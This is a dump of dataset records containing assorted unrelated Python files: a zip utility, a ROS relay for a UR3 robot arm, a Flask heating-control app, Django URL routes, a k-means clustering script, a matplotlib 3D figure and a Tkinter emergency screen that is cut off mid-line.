fields[field]['MINBIT'] + 1\n bit = 'bit'\n if width > 1:\n bit += 's'\n info += \" Width: {} {}\\n\".format(width, bit)\n maxstr = format_val((1 << width) - 1)\n info += \" Value (default, min, max): \" \\\n \"0, 0, {}\\n\".format(maxstr)\n info += \" Attribute: {}\\n\".format(tag)\n elif '_MINVAL' in fields[field] and '_MAXVAL' in fields[field]:\n info += \" Width: N/A\\n\"\n info += \" Value (default, min, max): \" \\\n \"{0}, {0}, {1}\\n\".format(fields[field]['_MINVAL'],\n fields[field]['_MAXVAL'])\n info += \" Attribute: {}\\n\".format(tag)\n return info\n\n def table_fields(self, table):\n 'Table fields generator.'\n if table not in self.tables:\n yield\n else:\n for field in self.tables[table]['FIELDS']:\n yield field\n\n","sub_path":"ncsc-1.3.3rc4/bmi/cli/ltm/tablesdb.py","file_name":"tablesdb.py","file_ext":"py","file_size_in_byte":8395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118776407","text":"import os\nimport sys\nimport zipfile\n\n#\n# def rename(pwd: str, filename=''):\n# \"\"\"压缩包内部文件有中文名, 解压后出现乱码,进行恢复\"\"\"\n#\n# path = f'{pwd}/{filename}'\n# if os.path.isdir(path):\n# for i in os.scandir(path):\n# rename(path, i.name)\n# newname = filename.encode('cp437').decode('gbk')\n# os.rename(path, f'{pwd}/{newname}')\n\n\n\"\"\"\nzip文件解压缩\n\nhttps://docs.python.org/zh-cn/3.9/library/zipfile.html?highlight=zipfile#\n\n\n\"\"\"\n\nimport zipfile\nfrom pyefun import *\nimport pyefun.commonlyUtil as commonlyUtil\n\n@异常处理返回类型逻辑型\ndef zip解压(压缩包的路径: str, 解压路径: str):\n file = zipfile.ZipFile(压缩包的路径)\n if 文件是否存在(解压路径) == False:\n commonlyUtil.目录_创建(解压路径)\n file.extractall(解压路径)\n file.close()\n\n\n@异常处理返回类型逻辑型\ndef zip压缩(保存压缩包的路径: str, 欲压缩文件或者文件夹: str,mode=\"w\"):\n pass\n 保存压缩包的路径 = 路径优化(保存压缩包的路径)\n 欲压缩文件或者文件夹 = 路径优化(欲压缩文件或者文件夹)\n 路径字符长度 = 取文本长度(欲压缩文件或者文件夹)\n if 文件_是否为文件(欲压缩文件或者文件夹):\n with zipfile.ZipFile(保存压缩包的路径, mode=mode) as target:\n target.write(欲压缩文件或者文件夹, 文件_取文件名(欲压缩文件或者文件夹))\n return True\n if 文件_是否为目录(欲压缩文件或者文件夹):\n with zipfile.ZipFile(保存压缩包的路径, mode=mode) as target:\n 压缩文件列表 = []\n for 路径信息 in os.walk(欲压缩文件或者文件夹):\n for 文件名 in 路径信息[2]:\n 目录 = 路径信息[0]\n 文件路径 = 路径_合并(目录, 文件名)\n 相对路径 = 取文本右边(文件路径, 取文本长度(文件路径) - 路径字符长度)\n if(文件路径 == 保存压缩包的路径):\n continue\n # 防止死循环一直压缩\n 压缩文件列表.append([文件路径,相对路径])\n\n # 开始压缩\n for item in 压缩文件列表:\n 文件路径 = item[0]\n 相对路径 = item[1]\n target.write(文件路径, 相对路径)\n return True\n","sub_path":"pyefun/encoding/compress/zip.py","file_name":"zip.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"358994003","text":"#! /usr/bin/env python\nfrom __future__ import print_function\n\nimport sys\nimport copy\nimport rospy\nimport moveit_commander\nimport moveit_msgs.msg as moveit_msg_lib\nimport std_msgs.msg as standard_mag_lib\nimport geometry_msgs.msg as geometry_msg_lib\nfrom math import pi\nfrom math import radians\nfrom std_msgs.msg import String\nfrom moveit_commander.conversions import pose_to_list\n\nfrom ur3_robotics.msg import UR3Joints\n\nrobot_model = \"UR3\"\n\nrobot, scene, move_group, display_trajectory_publisher, planning_frame, eef_link, group_names = None, None, None, None, None, None, None\n\ndef setup_robot(info, **kwargs):\n global robot, scene, move_group, display_trajectory_publisher, planning_frame, eef_link, group_names\n moveit_commander.roscpp_initialize(sys.argv)\n #rospy.init_node('ur3_main_node', anonymous=True)\n robot = moveit_commander.RobotCommander()\n scene = moveit_commander.PlanningSceneInterface()\n group_name = kwargs.get('movegroup', 'manipulator')\n move_group = moveit_commander.MoveGroupCommander(group_name)\n display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path'\n , moveit_msg_lib.DisplayTrajectory\n , queue_size=20)\n\n planning_frame = move_group.get_planning_frame()\n eef_link = move_group.get_end_effector_link()\n group_names = robot.get_group_names()\n\n if info:\n print('==== Reference frame: {}'.format(planning_frame))\n print('==== End effector ==: {}'.format(eef_link))\n print('==== Robot groups ==: {}'.format(group_names))\n print('==== Robot state ===: {}'.format(robot.get_current_state()))\n\ndef go_to_joint_goal(data):\n\n if info:\n print('==== Joint state from unity: \\n'\n 'joint base: {}\\n'\n 'joint shoulder: {}\\n'\n 'joint elbow: {}\\n'\n 'joint wrist1: {}\\n'\n 'joint wrist2: {}\\n'\n 'joint wrist3: {}\\n'\n .format(data.joint_base, data.joint_shoulder, data.joint_elbow,\n data.joint_wrist1, data.joint_wrist2, data.joint_wrist3))\n\n joint_state = []\n joint_state.append(radians(data.joint_base))\n joint_state.append(radians(data.joint_shoulder))\n joint_state.append(radians(data.joint_elbow))\n joint_state.append( radians(data.joint_wrist1))\n joint_state.append(radians(data.joint_wrist2))\n joint_state.append(radians(data.joint_wrist3))\n\n move_group.go(joint_state, wait=True)\n\n move_group.stop()\n\ndef callback(joint_data):\n if info:\n rospy.loginfo('\\n raw info from unity: {}\\n'.format(joint_data))\n go_to_joint_goal(joint_data)\n if info:\n rospy.loginfo('\\nexecution sucess\\n')\n\n\ndef listen_and_move_robot():\n rospy.init_node('relay_node', anonymous=True)\n rospy.Subscriber('joint_state', UR3Joints, callback)\n rospy.spin()\n\nif __name__ == '__main__':\n info = True\n print(\"you receive some system arguments: {}\".format(sys.argv))\n setup_robot(info=True, movegroup='manipulator')\n listen_and_move_robot()\n","sub_path":"src/robot_driver/scripts/relay.py","file_name":"relay.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"424996707","text":"\"\"\"\n Thực hiện code lại hàm sau và cho biết ý nghĩa của nó\ndef enter_data():\n while True:\n n = input(\"Nhập 1 số nguyên: \")\n if n.isnumeric():\n n = int(n)\n if n > 0:\n print(\"Đã nhập số dương\")\n return n\n print(\"Đã nhập số không dương. Chương trình sẽ tiếp tục!\")\n else:\n print(\"Dữ liệu đã nhập không phải số nguyên\")\n\"\"\"\n\n\ndef enter_data():\n \"\"\"\n - Hàm này thực hiện nhiệm vụ nhập vào một số nguyên dương bất kỳ từ bàn phím.\n - Hoạt động:\n + hàm sẽ đọc các ký tự nhập vào từ bàn phím.\n + Nếu đó là một số nguyên dương ta trả về giá trj n\n + Nếu đó là số không dương ta bắt đầu lại. bắt người dùng nhập lại giá trị.\n + Nếu đó không phải là một số nguyên thì ta bắt người dùng nhập lại.\n - Hàm sẽ thực hiện liên tục cho đến khi ký tự nhận được là một số nguyên dương.\n :return: Trả về giá trị là một số nguyên dương.\n \"\"\"\n while True:\n n = input(\"Nhập 1 số nguyên: \")\n # Câu lệnh đọc các ký tự từ bàn phím\n if n.isnumeric(): # Hàm diều kiện n.isumeric() sẽ trả lại True nếu tất cả ký tự là chữ số\n n = int(n) # Nếu ký tự nhập là số ta chuyển đổi thành số nguyên nguyên bằng hàm int()\n if n > 0: # Kiểm tra xem số n > 0 hay ko?\n print(\"Đã nhập số dương\") # In ra khi số n là số nguyên dương\n return n # Trả lại giá trị n\n print(\"Đã nhập số không dương. Chương trình sẽ tiếp tục!\") # In ra khi n là số không dương\n else:\n print(\"Dữ liệu đã nhập không phải số nguyên\") # In ra ko các ký tự không phải là các chữ số\n\n\na = enter_data()\nprint(a)\n","sub_path":"Buoi7_bai13_giaithichham.py","file_name":"Buoi7_bai13_giaithichham.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"23385112","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.logandreg),\n path('register', views.register),\n path('login', views.login),\n path('process_quote', views.process_quote),\n path('quotes', views.quotes),\n path('logout', views.logout),\n path('user_profile/',views.profile),\n path('my_profile/', views.edituser),\n path('updateaccount/', views.updateaccount),\n path('delete/', views.destroy),\n path('like/', views.add_like),\n\n]\n","sub_path":"python_stack1/django/django_full_stack/quote_dash/userquote/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"448754458","text":"#!flask/bin/python3\nfrom flask import Flask, render_template, request, redirect\nimport os, os.path, sys, subprocess, socket, sqlite3, threading\nimport math, glob\nimport datetime, time\nfrom app import app\n\ndata=[]\ndbData=[]\ndbData2=[]\ntimeData=[]\ngraphDataTEMP=[]\ngraphDataTIME=[]\nindexCSS=['styles/base_style.css', 'styles/index_style.css']\nmobileCSS=['styles/base_style.css', 'styles/mobile_style.css']\nsummerMONTHS=['June', 'July', 'August', 'September']\nsource='INDEX'\n\nworkingdir='/media/Backup/GitRepo/Heating'\nlib_path = os.path.abspath(os.path.join(workingdir, 'lib'))\nsys.path.append(lib_path)\n\ndef dateTime():\n global dateTimeLIST\n now=datetime.datetime.now()\n dateTimeLIST=[]\n dateTimeLIST.append(now.strftime(\"%A\"))\n dateTimeLIST.append(now.strftime(\"%d\"))\n dateTimeLIST.append(now.strftime(\"%B\"))\n dateTimeLIST.append(now.strftime(\"%Y\"))\n dateTimeLIST.append(str(now.strftime(\"%H:%M:%S\")))\n dateTimeLIST.append(now.strftime(\"%a\"))\n \ndef getData():\n global dbData, dbData2, timeData, graphDataTEMP, graphDataTIME, scheduleRUN, summerTEXT\n dateTime()\n db=(workingdir+\"/app/database/templogs/\"+dateTimeLIST[3]+\"/\"+dateTimeLIST[2]+\"/\"+dateTimeLIST[1]+\".db\")\n with sqlite3.connect(db) as tempconn:\n curs=tempconn.cursor()\n curs.execute('SELECT * FROM temps ORDER BY ROWID DESC LIMIT 1')\n dbData=curs.fetchone()\n curs.execute('SELECT * FROM override ORDER BY ROWID DESC LIMIT 1')\n dbData2=curs.fetchone()\n curs.execute('SELECT * FROM time ORDER BY ROWID DESC LIMIT 1')\n timeData=curs.fetchone()\n curs.execute('SELECT temp, timestamp FROM temps ORDER BY ROWID ASC LIMIT 10000')\n graphData=curs.fetchall()\n graphData=graphData[::250]\n graphDataTEMP= ( x[0] for x in graphData)\n graphDataTIME= ( x[1] for x in graphData)\n scheduleRUN=dbData[8]\n schedON=scheduleRUN[2:7]\n schedOFF=scheduleRUN[11:16]\n if (scheduleRUN == '') or (scheduleRUN == 'OFF'):\n scheduleRUN='OFF'\n else:\n scheduleRUN=(schedON+' till '+schedOFF)\n if (dbData2[5] == 'ON') and (dbData2[4] == 'OFF'):\n summerTEXT=\"Manual Summer Mode\"\n elif (dbData2[5] == 'ON') and (dbData2[4] == 'ON'):\n summerTEXT=\"Manual Winter Mode\"\n elif (dbData2[4] == 'ON') and (dateTimeLIST[2] in summerMONTHS):\n summerTEXT=\"Summer Mode Active\"\n else:\n summerTEXT=''\n \ndef manualoverride():\n dateTime()\n db=(workingdir+\"/app/database/templogs/\"+dateTimeLIST[3]+\"/\"+dateTimeLIST[2]+\"/\"+dateTimeLIST[1]+\".db\")\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute('SELECT * FROM override ORDER BY ROWID DESC LIMIT 1')\n lastRow=curs.fetchone()\n if lastRow[2] == 'ON':\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], '', 'OFF', 'OFF', lastRow[4], lastRow[5]))\n stateconn.commit()\n else:\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], '', 'ON', 'OFF', lastRow[4], lastRow[5]))\n stateconn.commit()\n \ndef advancedoverride():\n dateTime()\n db=(workingdir+\"/app/database/templogs/\"+dateTimeLIST[3]+\"/\"+dateTimeLIST[2]+\"/\"+dateTimeLIST[1]+\".db\")\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute('SELECT * FROM override ORDER BY ROWID DESC LIMIT 1')\n lastRow=curs.fetchone()\n advancedOverride=lastRow[3]\n if advancedOverride == 'OFF':\n hourPlus1=datetime.datetime.now() + datetime.timedelta(hours=1)\n advancedOverride=str(hourPlus1.strftime(\"%H:%M\"))\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], '', 'ON', advancedOverride, lastRow[4], lastRow[5]))\n stateconn.commit()\n else:\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], '', 'OFF', 'OFF', lastRow[4], lastRow[5]))\n stateconn.commit()\n\ndef summermode():\n dateTime()\n db=(workingdir+\"/app/database/templogs/\"+dateTimeLIST[3]+\"/\"+dateTimeLIST[2]+\"/\"+dateTimeLIST[1]+\".db\")\n with sqlite3.connect(db) as tempconn:\n curs=tempconn.cursor()\n curs.execute('SELECT * FROM override ORDER BY ROWID DESC LIMIT 1')\n lastRow=curs.fetchone()\n if (lastRow[4] == 'ON') and (lastRow[5] == 'OFF'):\n summerOverride='OFF'\n manSumOverride='ON'\n elif (lastRow[4] == 'OFF') and (lastRow[5] == 'OFF'):\n summerOverride='OFF'\n manSumOverride='ON'\n elif (lastRow[4] == 'OFF') and (lastRow[5] == 'ON'):\n summerOverride='ON'\n manSumOverride='ON'\n else:\n summerOverride='OFF'\n manSumOverride='OFF' \n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], lastRow[1], lastRow[2], lastRow[3], summerOverride, manSumOverride))\n tempconn.commit()\n \n@app.route('/')\n@app.route('/index')\ndef home():\n global source\n getData()\n source=\"INDEX\"\n return render_template(\"index.html\", source=source, styles=indexCSS, data=dateTimeLIST, dbData=dbData, dbData2=dbData2, summerTEXT=summerTEXT, timeData=timeData, graphDataTEMP=graphDataTEMP, graphDataTIME=graphDataTIME, scheduleRUN=scheduleRUN)\n\n@app.route('/mobile')\ndef mobile():\n global source\n getData()\n source=\"MOBILE\"\n return render_template(\"mobile.html\", source=source, styles=mobileCSS, data=dateTimeLIST, dbData=dbData, dbData2=dbData2, summerTEXT=summerTEXT, timeData=timeData, graphDataTEMP=graphDataTEMP, graphDataTIME=graphDataTIME, scheduleRUN=scheduleRUN)\n\n@app.route('/manual')\ndef manual():\n global source\n manualoverride()\n return redirect(\"/\")\n\n@app.route('/advance')\ndef advance():\n global source\n advancedoverride()\n return redirect(\"/\")\n\n@app.route('/winter')\ndef winter():\n global source\n wintermode()\n return redirect(\"/\")\n\n@app.route('/mobmanual')\ndef mobmanual():\n global source\n manualoverride()\n return redirect(\"/mobile\")\n\n@app.route('/mobadvance')\ndef mobadvance():\n advancedoverride()\n return redirect(\"/mobile\")\n\n@app.route('/mobsummer')\ndef mobsummer():\n summermode()\n return redirect(\"/mobile\")\n \n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"249787103","text":"# coding: utf-8\nfrom common.layers import *\nfrom common.loss_layer import *\n\nlayer_dict={\n 'relu':Relu,'sigmoid':Sigmoid, 'tanh':Tanh,\n 'conv':Convolution,'deconv':Deconvolution,'pool':Pooling,'affine':Affine,\n 'batchnorm':BatchNormalization,'gap':GAP,\n 'convres':ConvResNet,'repeat':Repeat,'dropout':Dropout,'flatten':Flatten,\n 'toimage':ToImage\n }\n \nloss_layer_dict={\n 'mse':MSE,'softmax':SoftmaxWithLoss\n }","sub_path":"common/layer_dictionary.py","file_name":"layer_dictionary.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105879921","text":"\n\nfrom xai.brain.wordbase.verbs._revolve import _REVOLVE\n\n#calss header\nclass _REVOLVES(_REVOLVE, ):\n\tdef __init__(self,): \n\t\t_REVOLVE.__init__(self)\n\t\tself.name = \"REVOLVES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"revolve\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_revolves.py","file_name":"_revolves.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"631759010","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n#import matplotlib as mpl\n#mpl.use('pgf')\nfrom matplotlib import pyplot\nimport mpl_toolkits.mplot3d.axes3d as p3\nfrom mpl_toolkits.mplot3d import proj3d\n\nimport sys\nsys.path.append(r'C:\\Documents and Settings\\The One\\My Documents\\tony\\2014\\xelatexfolder\\pgf_related\\programming_drawing_in_3D_toolbox')\nimport vector_drawing_basic_geometry_3D as tool\n\n#### The plotting of a vector-based graphics using the above points location information.\nfig2 = pyplot.figure(2,figsize=(4, 3),dpi=100)\nax2 = p3.Axes3D(fig2)\nax2.view_init(elev=40, azim=-40)\nax2.set_color_cycle('b')\n\n\npo = np.array([0,0,0])#origin\npx = np.array([1,0,0])\npy = np.array([0,1,0])\npz = np.array([0,0,1])\npA = np.array([1,1,1])/2.0\n\n#bb = 1.3\n#plb = np.array([-0.1*bb,0,-0.1*bb])\n#plt = np.array([-0.1*bb,0,5*bb])\n#ptr = np.array([5*bb,0,5*bb])\n#pbr = np.array([5*bb,0,-0.1*bb])\n\n#xyz axes\nfarrowx = tool.Arrow3D(*zip(po,px),mutation_scale=16, lw=2, arrowstyle=\"-|>\", \n color=\"b\")\nax2.add_artist(farrowx)\nfarrowy = tool.Arrow3D(*zip(po,py),mutation_scale=16, lw=2, arrowstyle=\"-|>\", \n color=\"b\")\nax2.add_artist(farrowy)\nfarrowz = tool.Arrow3D(*zip(po,pz),mutation_scale=16, lw=2, arrowstyle=\"-|>\", \n color=\"b\")\nax2.add_artist(farrowz)\nfarrowA = tool.Arrow3D(*zip(po,pA),mutation_scale=16, lw=2, arrowstyle=\"-|>\", \n color=\"k\")\nax2.add_artist(farrowA)\n\nn_vec = np.cross(px/np.linalg.norm(px),pA/np.linalg.norm(pA))\narc_alpha = 0.3*tool.circle_arc(n_vec,px,pA,20)\nlarc_alpha, = ax2.plot(arc_alpha[:,0],arc_alpha[:,1],arc_alpha[:,2],'r',lw=2)\n\n\n\n\nax2.text(*px, s = r'$x$', fontsize=14,verticalalignment='bottom', horizontalalignment='right')\nax2.text(*py, s = r'$y$', fontsize=14,verticalalignment='bottom', horizontalalignment='right')\nax2.text(*pz, s = r'$z$', fontsize=14,verticalalignment='top', horizontalalignment='left')\nax2.text(*pA, s = r\"$A$ at (0.5,0.5,0.5)\", fontsize=14,verticalalignment='bottom', horizontalalignment='left')\n\n\n\n#draw_perpendicular_sign(np.cross(pB-pQ,pE-pQ),pB-pQ,pE-pQ,pQ,ax2)\n\n\n#axis1.Axis(ax2,'r')\n#ax2.autoscale_view()\n#ax2.pbaspect= [1,1,0.5]\n#ax2.auto_scale_xyz()\n\nff = 0.75\nXt,Yt,Zt = zip(po,px,py,pz,pA)#,ff*plb,ff*ptr,ff*plt,ff*pbr)\nX = np.array(Xt)\nY = np.array(Yt)\nZ = np.array(Zt)\n\nmax_range = np.array([X.max()-X.min(), Y.max()-Y.min(), Z.max()-Z.min()]).max() / 2.0\n\n\nmid_x = (X.max()+X.min()) * 0.5\nmid_y = (Y.max()+Y.min()) * 0.5 \nmid_z = (Z.max()+Z.min()) * 0.5\nax2.set_xlim3d(mid_x - max_range, mid_x + max_range)\nax2.set_ylim3d(mid_y - max_range, mid_y + max_range)\nax2.set_zlim3d(mid_z - max_range, mid_z + max_range)\n#ax2.set_xlim3d([-3, 8])\n#ax2.set_ylim3d([-3,8])\n#ax2.set_zlim3d([-3,8])\n#ax2.set_xlim([-0.5,3.7])\n#ax2.set_ylim([-0.5,3.7])\n#ax2.set_zlim([0,6])\n\n\n#ax2.annotate(s = r'$x$',xy = tuple(proj3d.proj_transform(*px, M = ax2.get_proj()))[:2], fontsize = 14, bbox={'pad':8,'fill':None,'edgecolor':'None'},va='top',ha='left')\n#ax2.annotate(s = r'$y$',xy = tuple(proj3d.proj_transform(*py, M = ax2.get_proj()))[:2], fontsize = 14, bbox={'pad':8,'fill':None,'edgecolor':'None'},va='top',ha='right')\n#ax2.annotate(s = r'$z$',xy = tuple(proj3d.proj_transform(*pz, M = ax2.get_proj()))[:2], fontsize = 14, bbox={'pad':12,'fill':None,'edgecolor':'None'},va='bottom',ha='right')\n\n\nax2.set_xticks([])\nax2.set_yticks([])\nax2.set_zticks([])\nax2.w_xaxis.line.set_visible(False) #turn off axis visibility\n#ax2.w_xaxis.line.set_color([0,0,0,0])\nax2.w_yaxis.line.set_color([0,0,0,0]) # change the color of axis\nax2.w_zaxis.line.set_color([0,0,0,0])\n#ax2.spines['left'].set_color('b') didn't work on 3D\nax2.set_axis_off() #-> this can turn off the background curtain\n#ax2.axhline(y=1,xmin=0,xmax=1)\n#ax2.set_frame_on(True)\n#ax2.set_axis_bgcolor('b')\n#ax2.set_position() #set the bbox of the whole axes\n#ax2.set_zbound()\npyplot.show()\n#pyplot.savefig(r'C:\\Documents and Settings\\The One\\My Documents\\tony\\2014\\xelatexfolder\\pgf_related\\pgf\\lemma4_fig4.pgf')\n\n","sub_path":"drawing_code/python/py_annotate_code_documentation/figures/circle_arc_fig.py","file_name":"circle_arc_fig.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"298551936","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndef loadDataSet(filename):\n \n \"\"\"\n 读取数据集\n\n Args:\n filename: 文件名\n Returns:\n dataMat: 数据样本矩阵\n \"\"\"\n dataMat = []\n fr = open(filename)\n for line in fr.readlines():\n curLine = line.strip().split('\\t')\n # 通过map函数批量转换\n fitLine = map(float, curLine)\n dataMat.append(fitLine)\n return dataMat\n\ndef distEclud(vecA, vecB):\n \"\"\"\n 计算两向量的欧氏距离\n\n Args:\n vecA: 向量A\n vecB: 向量B\n Returns:\n 欧式距离\n \"\"\"\n return np.sqrt(np.sum(np.power(vecA - vecB, 2)))\n\ndef randCent(dataSet, k):\n \"\"\"\n 随机生成k个聚类中心\n\n Args:\n dataSet: 数据集\n k: 簇数目\n Returns:\n centroids: 聚类中心矩阵\n \"\"\"\n _, n = dataSet.shape\n centroids = np.mat(np.zeros((k, n)))\n for j in range(n):\n # 随机聚类中心落在数据集的边界之内\n minJ = np.min(dataSet[:, j])\n maxJ = np.max(dataSet[:, j])\n rangeJ = float(maxJ - minJ)\n centroids[:, j] = minJ + rangeJ * np.random.rand(k, 1)\n return centroids\n\ndef kMeans(dataSet, k, maxIter = 5):\n \"\"\"\n K-Means\n\n Args:\n dataSet: 数据集\n k: 聚类数\n Returns:\n centroids: 聚类中心\n clusterAssment: 点分配结果\n \"\"\"\n # 随机初始化聚类中心\n centroids = randCent(dataSet, k)\n m, n = np.shape(dataSet)\n # 点分配结果: 第一列指明样本所在的簇,第二列指明该样本到聚类中心的距离\n clusterAssment = np.mat(np.zeros((m, 2)))\n # 标识聚类中心是否仍在改变\n clusterChanged = True\n # 直至聚类中心不再变化\n iterCount = 0\n while clusterChanged and iterCount < maxIter:\n iterCount += 1\n clusterChanged = False\n # 分配样本到簇\n for i in range(m):\n # 计算第i个样本到各个聚类中心的距离\n minIndex = 0\n minDist = np.inf\n for j in range(k):\n dist = distEclud(dataSet[i, :], centroids[j, :])\n if(dist < minDist):\n minIndex = j\n minDist = dist\n # 判断cluster是否改变\n if(clusterAssment[i, 0] != minIndex):\n clusterChanged = True\n clusterAssment[i, :] = minIndex, minDist**2\n # 刷新聚类中心: 移动聚类中心到所在簇的均值位置\n for cent in range(k):\n # 通过数组过滤获得簇中的点\n ptsInCluster = dataSet[np.nonzero(clusterAssment[:, 0].A == cent)[0]]\n if ptsInCluster.shape[0] > 0:\n # 计算均值并移动\n centroids[cent, :] = np.mean(ptsInCluster, axis=0)\n return centroids, clusterAssment\ndef biKmeans(dataSet, k):\n \"\"\"\n Args:\n dataSet: 数据集\n k: 聚类数\n Returns:\n centroids: 聚类中心\n clusterAssment: 点分配结果\n \"\"\"\n # 随机初始化聚类中心\n centroids = randCent(dataSet, k)\n m, n = np.shape(dataSet)\n # 点分配结果: 第一列指明样本所在的簇,第二列指明该样本到聚类中心的距离\n clusterAssment = np.mat(np.zeros((m, 2)))\n # 标识聚类中心是否仍在改变\n clusterChanged = True\n # 直至聚类中心不再变化\n while clusterChanged:\n clusterChanged = False\n # 分配样本到簇\n for i in range(m):\n # 计算第i个样本到各个聚类中心的距离\n minIndex = 0\n minDist = np.inf\n for j in range(k):\n dist = distEclud(dataSet[i, :], centroids[j, :])\n if(dist < minDist):\n minIndex = j\n minDist = dist\n # 判断cluster是否改变\n if(clusterAssment[i, 0] != minIndex):\n clusterChanged = True\n clusterAssment[i, :] = minIndex, minDist**2\n # 刷新聚类中心: 移动聚类中心到所在簇的均值位置\n for cent in range(k):\n # 通过数组过滤获得簇中的点\n ptsInCluster = dataSet[np.nonzero(\n clusterAssment[:, 0].A == cent)[0]]\n # 计算均值并移动\n centroids[cent, :] = np.mean(ptsInCluster, axis=0)\n return centroids, clusterAssment\ndata='D:/machinelearninginaction/Ch10/testSet.txt'\ndataMat = np.mat(loadDataSet(data))\ncentroids1, clusterAssment1 = biKmeans(dataMat, 4)\ncentroids0,clusterAssment0=kMeans(dataMat, 4)\nclusterCount1 = centroids1.shape[0]\nclusterCount0=centroids0.shape[0]\nm = dataMat.shape[0]\n # 绘制散点图\npatterns = ['o', 'D', '^','p']\ncolors = ['b', 'g', 'y','r']\nfig = plt.figure()\ntitle = 'bi-kmeans with k=4'\nax = fig.add_subplot(211, title=title)\nfor k in range(clusterCount1):\n # 绘制聚类中心,centrioids:聚类中心点,\n ax.scatter(centroids1[k,0], centroids1[k,1], color='r', marker='+', linewidth=20)\n for i in range(m):\n # 绘制属于该聚类中心的样本\n ptsInCluster1 = dataMat[np.nonzero(clusterAssment1[:, 0].A==k)[0]]\n ax.scatter(ptsInCluster1[:, 0].flatten().A[0], ptsInCluster1[:, 1].flatten().A[0], marker=patterns[k], color=colors[k])\nax=fig.add_subplot(212,title='kmeans with k=4')\nfor k in range(clusterCount0):\n # 绘制聚类中心,在绘制聚类中心时主要将其与scatter形式展现\n ax.scatter(centroids0[k,0], centroids0[k,1], color='r', marker='+', linewidth=20)\n for i in range(m):\n # 绘制属于该聚类中心的样本\n ptsInCluster0 = dataMat[np.nonzero(clusterAssment0[:, 0].A==k)[0]]\n ax.scatter(ptsInCluster0[:, 0].flatten().A[0], ptsInCluster0[:, 1].flatten().A[0], marker=patterns[k], color=colors[k])\nplt.show()","sub_path":"demo3/demo2Kmeans/kMeans.py","file_name":"kMeans.py","file_ext":"py","file_size_in_byte":5867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"479691605","text":"from tkinter import *\r\n\r\n\r\n#creer une première fenêtre\r\nurgence_fenetre = Tk()\r\n\r\n#personnalisation\r\nurgence_fenetre.title(\"KeepKalm\")\r\nurgence_fenetre.geometry(\"700x600\")\r\nurgence_fenetre.config(bg=\"#34d4ff\")\r\nurgence_fenetre.minsize(1200,720)\r\nurgence_fenetre.attributes('-fullscreen', True)\r\n\r\nl1 = LabelFrame(urgence_fenetre, text=\"Langues\", padx=20, pady=15,relief=\"raised\",bd=5)\r\nl1.pack(side=LEFT, anchor=NW)\r\nl1.configure(bg=\"#22ffb9\")\r\nLabel(l1, text=\"FR\", bg=\"#22ffb9\").pack()\r\n\r\nl2 = LabelFrame(urgence_fenetre, text=\"Infos\", padx=20, pady=15,relief=\"raised\",bd=5)\r\nl2.pack(side=RIGHT, anchor=NE)\r\nl2.configure(bg=\"#22ffb9\")\r\nLabel(l2, text=\"Rouault\",bg=\"#01ffbb\").pack()\r\nLabel(l2, text=\"Clément\",bg=\"#01ffbb\").pack()\r\n\r\ntext_urgence = Label(urgence_fenetre, text=\"URGENCE\", padx=20, pady=15,relief=\"raised\")\r\ntext_urgence.pack(side=TOP, anchor=N)\r\ntext_urgence.configure(bg=\"red\", font=90)\r\n\r\nFrame3 = Frame(urgence_fenetre,bg=\"#34d4ff\", borderwidth=0)\r\nFrame3.pack(anchor=\"n\", pady=50)\r\n\r\nFrame8 = Frame(urgence_fenetre, bg=\"#34d4ff\", borderwidth=0)\r\nFrame8.pack(anchor=\"n\",side=RIGHT, pady=50)\r\n\r\nFrame4 = Frame(urgence_fenetre,bg=\"#34d4ff\", borderwidth=0)\r\nFrame4.pack(anchor=\"n\", side=LEFT, pady=50, padx=50)\r\n\r\n\r\n\r\nFrame1 = Frame(Frame3)\r\nFrame1.pack()\r\n\r\ntext_frame1=Label(Frame1, text=\"En cas de problème appeler d'urgence le personnel de santé qualifié : \",bg=\"#34d4ff\", pady=20,font=30,fg=\"red\")\r\ntext_frame1.pack()\r\n\r\nFrame2 = Frame(Frame4)\r\nFrame2.pack()\r\ntext_frame2 = 